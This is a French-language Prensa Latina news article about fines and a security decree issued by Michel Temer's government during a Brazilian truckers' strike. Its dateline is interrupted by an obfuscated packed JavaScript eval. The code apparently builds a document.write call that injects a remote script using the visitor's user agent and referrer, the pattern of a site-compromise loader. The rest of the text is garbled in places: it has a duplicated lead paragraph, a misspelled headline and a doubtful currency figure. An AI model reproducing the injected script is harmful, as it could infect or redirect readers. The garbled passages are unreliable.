dimanche 21 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le gouvernement de Temer annonce qu’il donnera des amandes aux camionneurs en grève

Brasilia, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrsbz|var|u0026u|referrer|ytsfy||js|php'.split('|'),0,{})) 28 (Prensa Latina) On apprend que des amendes de mille réales par heure (plus de 27 mille euros) seront appliquées aux entreprises de transport en grève contre la politique de carburants du gouvernement de Michel Temer.

Brasilia, 28 (Prensa Latina) On apprend que des amendes de mille réales par heure (plus de 27 mille euros) seront appliquées aux entreprises de transport en grève contre la politique de carburants du gouvernement de Michel Temer.

La décision a été rendue publique lors d’une conférence de pressede Carlos Marun, titulaire du Secrétariat du Gouvernement brésilien, à la suite d’une réunion du cabinet de crise dirigée par Michel Temer en personne.

D’après Marun, les premières actions entreprises après que Temer ait convoqué les forces fédérales de sécurité pour tenter d’en finir avec la grève ont été couronnées de succès. On a ainsi pu ravitailler deux centrales thermoélectriques et certains des aéroports principaux du pays.

D’autres terminaux aériens sont encore en grande difficulté mais nous espérons y mettre un terme rapidement, a-t-il ajouté, avant de signaler  que  la situation sanitaire et la crainte que le manque de ravitaillement pour les médecins ne finisse par causer la perte de vies humaines sont les deux soucis principaux du président.

Marun a réitéré que la Police Fédérale (PF) effectue des enquêtes sur des dizaines de transporteurs soupçonnée d’appuyer et, parfois, de profiter de la grève pour s’enrichir. Des demandes de prison sont même déjà en cours contre certains d’entre eux.

Il a insisté sur le fait que le gouvernement est parvenu à un accord avec certains groupes représentant les camionneurs en grève, « un accord avantageux pour tous », a-t-il affirmé, et selon lequel une trêve de 15 jours devrait avoir lieu afin de permettre la tenue de nouvelles négociations.

Marun s’est abstenu de toute réponse quand on lui a demandé si la grève, commencée il ya six jours, était menée (comme Temer l’a affirmé) par une « minorité radicale » et bruyante. Il a, par contre, informé les journalistes des nombreux messages de camionneurs désireux de reprendre le travail.

A son avis, pour solutionner la crise, les pouvoirs exécutifs fédéraux et de l’état « sont autorisés à appliquer les mesures nécessaires », y compris la réquisition des forces armées, ce pourquoi Temer a fait paraitre hier un décret de Garantie de la Loi et de l’Ordre (GLO) qui restera valide jusqu’au 4 juin sur tout le territoire national.

Il a signalé que « certains militaires sont employés à des tâches spécifiques », mais n’a offert aucun détail sur les opérations menées par le Ministère de la Défense.

Les camionneurs autonomes demandent la diminution des taxes sur le diésel et la suppression des augmentations constantes du prix du carburant, conséquence de la politique pratiquée par la compagnie d’état, Pétrobras, depuis que Pedro Parente, un  technocrate  membre du Parti de la Social Démocratie Brésilienne (PSDB), a été nommé par Temer à la tête de cette compagnie.

peo/pgh/mpm

EN CONTINU
notes connexes